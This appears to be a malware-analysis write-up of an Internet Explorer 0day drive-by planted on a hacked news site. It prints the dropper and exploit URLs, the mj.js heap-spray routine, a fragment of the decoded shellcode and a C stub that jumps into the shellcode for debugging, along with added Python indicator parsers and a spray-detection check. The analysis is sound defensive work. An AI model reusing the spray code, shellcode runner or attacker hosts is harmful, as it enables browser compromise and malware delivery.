Ie0dayCVE0806 network horse sample analysis


[Author]: Quan Ge (http://riusksk.blogbus.com)

Analysis tools:

MDecoder 0.66
EditPlus 3.01
FreShow
VC 6.0
OllyDbg 1.10
Sample source:

A website (Anhui News Network) that hackers had implanted with a Trojan: http://log.mtian.net/?p=1152001
Analysis result:

Log by MDecoder

[Root] http://www.ah.chinanews.com.cn/GuestBook/Images/con.wtxlj871/wenda./lpt9.mqhna976.asp (Changan car how about this stock? What will happen in the future? -- Stock --)

[Exp] http://1029a9.3322.org:225/yy2/index.htm (Exploit. Ie0dayCVE0806.)

[Script] http://1029a9.3322.org:225/yy2/mj.js

[Virus] http://231ad.3322.org:225/yy2/no.exe

[Exp] http://1029a9.3322.org:225/yy2/index.htm (Exploit. Ie0dayCVE0806.)

[Exp] http://1029a9.3322.org:225/yy2/index.htm (Exploit. Ie0dayCVE0806.)

[Script] http://js.160ads.com/i.js

[Script] http://js.160ads.com/+s (sr) +

[Iframe] http://js.160ads.com/+s (sr) +
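As an added example that is not part of the original write-up, here is a small Python parser for the MDecoder log format shown above. It walks the [Root]/[Exp]/[Script]/[Virus]/[Iframe] entries, collapses the repeated exploit hits, and pulls out the hosts, non-standard ports and dropped-binary URL that a defender would block or hunt for in proxy logs. The log lines are embedded as a constructed sample (with the spacing that extraction put into the URLs repaired); the dynamic-DNS suffix watchlist is an assumption of the example, not something the write-up states.

```python
import re
from urllib.parse import urlsplit

# Constructed sample: the MDecoder entries from the write-up, with the
# spacing that extraction put into the URLs (": 225", "mj. js") repaired.
MDECODER_LOG = """\
[Root] http://www.ah.chinanews.com.cn/GuestBook/Images/con.wtxlj871/wenda./lpt9.mqhna976.asp (Changan car how about this stock?)
[Exp] http://1029a9.3322.org:225/yy2/index.htm (Exploit. Ie0dayCVE0806.)
[Script] http://1029a9.3322.org:225/yy2/mj.js
[Virus] http://231ad.3322.org:225/yy2/no.exe
[Exp] http://1029a9.3322.org:225/yy2/index.htm (Exploit. Ie0dayCVE0806.)
[Exp] http://1029a9.3322.org:225/yy2/index.htm (Exploit. Ie0dayCVE0806.)
[Script] http://js.160ads.com/i.js
[Script] http://js.160ads.com/+s (sr) +
[Iframe] http://js.160ads.com/+s (sr) +
"""

# One log line: "[Tag] <url> (optional note)".
LINE_RE = re.compile(r"^\[(?P<tag>\w+)\]\s+(?P<url>\S+)(?:\s+(?P<note>.*))?$")

# Assumption of this example: suffixes of free dynamic-DNS services that a
# hunt team treats as a red flag when they appear in a drive-by chain.
DYNDNS_SUFFIXES = (".3322.org",)


def parse_mdecoder_log(text):
    """Return the distinct (tag, url) entries in log order, with host and port split out."""
    entries, seen = [], set()
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue                        # not a log entry
        tag, url, note = m.group("tag"), m.group("url"), m.group("note") or ""
        if (tag, url) in seen:
            continue                        # the exploit page is logged once per load
        seen.add((tag, url))
        parts = urlsplit(url)
        entries.append({
            "tag": tag,
            "url": url,
            "host": parts.hostname,
            "port": parts.port or 80,       # every entry here is plain http
            "note": note.strip("()").strip(),
        })
    return entries


def summarize(entries):
    """Group the chain by role and list the indicators worth blocking or searching for."""
    by_role = {}
    for e in entries:
        by_role.setdefault(e["tag"], []).append(e["url"])
    hosts = sorted({e["host"] for e in entries if e["host"]})
    return {
        "by_role": by_role,
        "hosts": hosts,
        "nonstandard_ports": sorted({(e["host"], e["port"]) for e in entries if e["port"] != 80}),
        "dyndns_hosts": [h for h in hosts if h.endswith(DYNDNS_SUFFIXES)],
        "payload_urls": by_role.get("Virus", []),
    }


if __name__ == "__main__":
    summary = summarize(parse_mdecoder_log(MDECODER_LOG))
    for role, urls in summary["by_role"].items():
        print(f"{role:7s} {len(urls)} url(s)")
    print("hosts to block:", summary["hosts"])
    print("hosts on non-standard ports:", summary["nonstandard_ports"])
    print("dynamic-DNS hosts:", summary["dyndns_hosts"])
    print("dropped binary:", summary["payload_urls"])
```

The two things the summary surfaces first are exactly what a web proxy rule would key on: the exploit and dropper hosts both sit on dynamic-DNS names and serve on port 225, while the compromised news site itself is the only "normal" host in the chain.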
Code Analysis:

Trojans:

Exploit code analysis:

Index.htm:

    ");
    }
    // -->

    // Set the hidden button

    // Pull in the malicious script http://1029a9.3322.org:225/yy2/mj.js

mj.js:

function auc2(){
    A3 = new Array();                       // create an Array object; these dynamically allocated objects/variables live on the heap
    var a5 = 0x86000 - (a4.length * 2);     // 536 KB minus the shellcode size in bytes (a4 is the %u-escaped shellcode string, defined elsewhere in mj.js): the number of bytes per spray block that must be filled with something other than shellcode, i.e. the NOP-like slide
    var LFlwBa = unescape("%u0c0c%u0c0c");
    while (LFlwBa.length < a5) {            // the comparison operand was lost in this copy of the page; a5 is assumed
        LFlwBa += LFlwBa;                   // grow the slide by doubling so every block is 0c0c0c0c apart from the shellcode
    };
    var a6 = LFlwBa.substring(0, a5 / 2);
    delete LFlwBa;
    for (i = 0; i < 270; i++) {
        A3[i] = a6 + a6 + a4;               // fill memory with 270 blocks of slide + shellcode to implement the heap spray
    }
}

Shellcode analysis

First remove the "+" concatenation operators from the shellcode part of the script, then run FreShow's ESC (escape) decoding on it:

...... Omitted content ...... \xEA\xEA\xEA\xEA\xEA\xEA\xEA
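As an added example that is not part of the original post, the following Python reproduces the two analysis steps just described: the %u-escape decoding that FreShow performs (so the slide and shellcode bytes can be inspected as they sit in memory), and the spray arithmetic of the auc2() routine in mj.js (block size 0x86000, 270 blocks, a6 + a6 + a4). It also includes a small regex-based check for the spray pattern in a script, the kind of rule a web-filtering or sandbox pipeline might apply. The JavaScript sample is embedded as a constructed copy of the reconstructed routine; the indicator regexes and the "exceeds the target address" check are assumptions of the example.

```python
import re

# Constructed sample: the heap-spray routine from mj.js as reconstructed in the
# write-up (a4 holds the %u-escaped shellcode and is defined elsewhere in the file).
SAMPLE_JS = r"""
function auc2(){
A3 = new Array();
var a5 = 0x86000-(a4.length*2);
var LFlwBa = unescape("%u0c0c%u0c0c");
while (LFlwBa.length < a5){
LFlwBa += LFlwBa;
};
var a6 = LFlwBa.substring(0, a5/2);
delete LFlwBa;
for (i = 0; i < 270; i++){
A3[i] = a6 + a6 + a4;
}
}
"""

ESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s):
    """Decode %uXXXX and %XX escapes like JavaScript's unescape(): one UTF-16 code unit each."""
    return ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def to_memory_bytes(s):
    """Bytes of a JS string as they sit in memory: UTF-16 little-endian, lone surrogates kept."""
    return s.encode("utf-16-le", "surrogatepass")


def slide_pattern(escaped, a5):
    """Build the slide exactly as mj.js does and report the 4-byte value it repeats in memory."""
    s = js_unescape(escaped)
    while len(s) < a5:
        s += s                              # LFlwBa += LFlwBa
    a6 = s[:a5 // 2]                        # LFlwBa.substring(0, a5/2)
    mem = to_memory_bytes(a6)
    uniform = all(mem[i:i + 4] == mem[:4] for i in range(0, len(mem) - 3, 4))
    return mem[:4].hex(), len(mem), uniform


def spray_layout(shellcode_units, block_bytes=0x86000, blocks=270):
    """Reproduce the mj.js arithmetic: a5 = 0x86000 - shellcode bytes, a6 = a5/2 chars, block = a6 + a6 + a4."""
    a5 = block_bytes - shellcode_units * 2  # slide budget per block, in bytes
    a6_units = a5 // 2                      # characters in a6
    block_units = 2 * a6_units + shellcode_units
    total = block_units * 2 * blocks
    return {
        "slide_bytes_per_block": 2 * a6_units * 2,
        "block_bytes": block_units * 2,
        "total_bytes": total,
        # Assumption: a rough reachability check, true when the total sprayed size
        # exceeds the 0x0c0c0c0c target so a heap growing from a low base covers it.
        "exceeds_0c0c0c0c": total > 0x0C0C0C0C,
    }


# Assumed indicators: constructed for this example, not a published rule set.
SPRAY_INDICATORS = {
    "slide built from a repeated %u escape": re.compile(r"unescape\(\s*['\"](%u0[0-9a-f]0[0-9a-f])\1", re.I),
    "string doubled onto itself in a loop": re.compile(r"(\w+)\s*\+=\s*\1\s*;"),
    "array filled in a counted loop": re.compile(r"for\s*\([^)]*<\s*\d+[^)]*\)\s*\{\s*\w+\s*\[\s*\w+\s*\]\s*="),
}


def scan_for_heap_spray(js):
    """Return the names of the spray indicators present in a script, sorted."""
    return sorted(name for name, rx in SPRAY_INDICATORS.items() if rx.search(js))


if __name__ == "__main__":
    print(slide_pattern("%u0c0c%u0c0c", 0x86000 - 1000))
    print(spray_layout(500))                # e.g. a 500-code-unit (1000-byte) shellcode
    print(scan_for_heap_spray(SAMPLE_JS))
```

Running it shows why 0x0c0c0c0c is both the slide value and the target: the slide is the same four bytes repeated, each block is about 1 MB (a6 + a6 is twice the 536 KB budget, plus the shellcode), and 270 blocks come to roughly 296 MB, well past the 0x0c0c0c0c (about 193 MB) address the exploit steers execution to.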

Use VC to write the following code:

int main()
{
    // decoded shellcode bytes (truncated in the original write-up)
    char shellcode[] = "\xbc\xe4\x55\xf2\xbf\xbd\xbd\x5f\x44\x3c\x51\xbd\xbc\xbd\xbd\xbd\x36\x61 ...... Omitted content ......";
    __asm {
        lea eax, shellcode   // address of the shellcode buffer
        push eax
        ret                  // "return" into the buffer so execution starts at the shellcode
    }
    return 0;
}

Compile it with VC, load the resulting program in OllyDbg, step with F8 until execution enters the shellcode, and then:

0012FBAC   58      POP EAX
0012FBAD   58      POP EAX
0012FBAE   58      POP EAX
0012FBAF   58      POP EAX
0012FBB0   EB 10
